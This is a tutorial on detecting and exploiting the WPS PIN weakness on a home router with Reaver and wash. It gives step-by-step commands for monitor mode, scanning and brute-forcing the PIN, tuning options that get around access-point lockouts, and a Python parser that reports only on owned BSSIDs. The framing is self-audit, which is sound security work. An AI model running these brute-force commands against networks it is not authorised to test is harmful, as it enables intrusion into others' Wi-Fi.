WPS – How to install and use Reaver to detect the WPS on your home router
WPS was supposed to make securing your Wi-Fi easier; alas, it undermined much of your security. Install Reaver to see what I mean.
Step 1 – Download Reaver
sudo apt-get install aircrack-ng reaver
Step 2 – Put your wireless card into “monitor mode”
Check that your wireless card is detected before continuing. The command below puts wlan0 into monitor mode and creates the monitor interface mon0:
sudo airmon-ng start wlan0
Step 3 – Find the Unique ID of your Router
Run airodump-ng on the monitor interface (mon0) to list the nearby access points, then press Control + C to stop airodump-ng so you can cut and paste the base station ID (BSSID) of your router.
Open a second root terminal.
Step 4 – Use Wash to find WPS Routers
wash -i mon0
Note: if you get FCS errors in the wash output, re-run wash with the --ignore-fcs option:
wash -i mon0 --ignore-fcs
Step 5 – Start Reaver running against your Routers’ ID
Cut and paste the base station MAC (BSSID) from your first terminal:
reaver -i mon0 -b AA:BB:CC:65:FF:B4 -vv
-i mon0 (monitor interface): wlan0 must be put into monitor mode as mon0 so that Reaver can listen to all packets.
-b bssid (Basic Service Set Identifier) of the router you are attacking. The BSSID is the MAC address of the router. The ESSID is the human-readable name of the router, e.g. “useless” or “wobbly”.
-vv (very verbose)
Usually, the only required arguments to Reaver are the interface name and the BSSID of the target AP.
Step 6 – Useful Reaver commands for running against your Routers’ ID
By default, if the AP switches channels, Reaver will also change its channel accordingly. However, this feature may be disabled by fixing the interface’s channel:
reaver -i mon0 -b 00:01:02:03:04:05 --fixed
The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second):
reaver -i mon0 -b 00:01:02:03:04:05 -t 2
The default delay period between pin attempts is 1 second. This value can be increased or decreased to any non-negative integer value. A value of zero means no delay:
reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Some APs will temporarily lock their WPS state, typically for five minutes or less, when “suspicious” activity is detected. The time (in seconds) Reaver waits before retrying a locked AP can be set with --lock-delay:
reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
For additional output, the verbose option may be provided. Providing the verbose option twice will increase verbosity and display each pin number as it is attempted:
reaver -i mon0 -b 00:01:02:03:04:05 -vv
When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this may be a sign that the AP is rate limiting pin attempts or simply being overloaded, a sleep can be put in place that will occur whenever these warning messages appear:
reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=120
Additional Info – Setting the exact channel etc.
reaver -i mon0 -b (bssid) -vv -c (channel) -e (name of AP) -p (wps pin)
Step 7 – Background info on Wash
WPS can be used either with a push button on the router or with a PIN. Wash targets the PIN-based WPS systems, not the push-button method.
Wash will only show access points that support WPS. Wash displays the following information for each discovered access point:
BSSID – the BSSID of the AP
Channel – the AP's channel, as specified in the AP's beacon packet
WPS Version – the WPS version supported by the AP
WPS Locked – the locked status of WPS, as reported in the AP's beacon packet
ESSID – the ESSID of the AP
However, wash can be instructed to send probe requests to each AP in order to obtain more information about it:
wash -i mon0 --scan
By sending probe requests, wash will elicit a probe response from each AP. For WPS-capable APs, the WPS information element typically contains additional information about the AP, including make, model, and version data. This data is stored in the survey table of the reaver.db database.
Source: http://reaver-wps.googlecode.com/svn/trunk/docs/README.WASH
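Since the point of running wash at home is to find out whether your own router advertises an unlocked WPS PIN, here is an added example (my own code, not part of Reaver or wash) that parses a saved wash scan and reports the WPS exposure of the BSSIDs you own. It assumes the column order listed above (BSSID, Channel, WPS Version, WPS Locked, ESSID) plus an optional RSSI column that some wash builds print; the sample scan embedded below is constructed, not real output.

```python
"""Parse saved `wash` output and flag your own APs whose WPS PIN is exposed.

Added example for auditing your own network; not part of Reaver/wash.  The
column layout assumed here (BSSID, Channel, optional RSSI, WPS Version,
WPS Locked, ESSID) follows the fields the page lists; RSSI is an assumed
extra column, so the parser treats it as optional.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# One wash data row: MAC, channel, optional signed RSSI, version like 1.0,
# Yes/No locked flag, then the ESSID (which may contain spaces).
WASH_ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"(?P<channel>\d+)\s+"
    r"(?:(?P<rssi>-?\d+)\s+)?"
    r"(?P<version>\d+\.\d+)\s+"
    r"(?P<locked>Yes|No)\s+"
    r"(?P<essid>.*?)\s*$"
)

# Constructed sample scan (not real wash output); BSSIDs/ESSIDs are made up.
SAMPLE_WASH_OUTPUT = """\
BSSID                  Channel   RSSI   WPS Version   WPS Locked   ESSID
------------------------------------------------------------------------
AA:BB:CC:65:FF:B4      6         -51    1.0           No           wobbly
AA:BB:CC:12:34:56      11        -70    1.0           Yes          useless
AA:BB:CC:00:00:01      1         -80    2.0           No           Neighbour 5G
"""


@dataclass
class WpsAp:
    bssid: str
    channel: int
    version: str
    locked: bool
    essid: str


def parse_wash(output: str) -> list[WpsAp]:
    """Return one WpsAp per data row; header, separator and blank lines are skipped."""
    aps: list[WpsAp] = []
    for line in output.splitlines():
        m = WASH_ROW.match(line.strip())
        if not m:
            continue
        aps.append(WpsAp(
            bssid=m["bssid"].upper(),
            channel=int(m["channel"]),
            version=m["version"],
            locked=(m["locked"] == "Yes"),
            essid=m["essid"],
        ))
    return aps


def audit(aps: list[WpsAp], own_bssids: list[str]) -> list[str]:
    """Report the WPS exposure of the APs you own (matched by BSSID).

    wash only lists APs that advertise WPS, so every row here accepts the
    external-registrar PIN exchange: 'WPS Locked = No' means the PIN can be
    brute-forced right now, 'Yes' means the AP has only temporarily locked it.
    """
    own = {b.upper() for b in own_bssids}
    findings = []
    for ap in aps:
        if ap.bssid not in own:
            continue  # neighbours' APs are not ours to assess
        state = "WPS PIN locked (temporary)" if ap.locked else "WPS PIN exposed"
        findings.append(
            f"{ap.essid} ({ap.bssid}, ch {ap.channel}, WPS {ap.version}): "
            f"{state} - disable the WPS PIN in the router admin page"
        )
    # Owned BSSIDs absent from the scan either do not advertise WPS (good)
    # or were simply out of range / on a channel not yet scanned.
    for b in sorted(own - {ap.bssid for ap in aps}):
        findings.append(f"{b}: not advertising WPS (good) or not seen in this scan")
    return findings


if __name__ == "__main__":
    # Replace the list with your own router's BSSID(s) copied from airodump-ng.
    for finding in audit(parse_wash(SAMPLE_WASH_OUTPUT), ["AA:BB:CC:65:FF:B4"]):
        print(finding)
```

Save the wash output to a file (e.g. `wash -i mon0 > scan.txt`) and pass its contents to `parse_wash`; the script deliberately ignores any BSSID you do not list as your own, so it only ever reports on your equipment.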
WPS Flaw Vulnerable Devices – a list of router models and whether they are vulnerable to WPS attacks. Select your router manufacturer, then model, and the spreadsheet will tell you how many hours it would take to crack your router via WPS.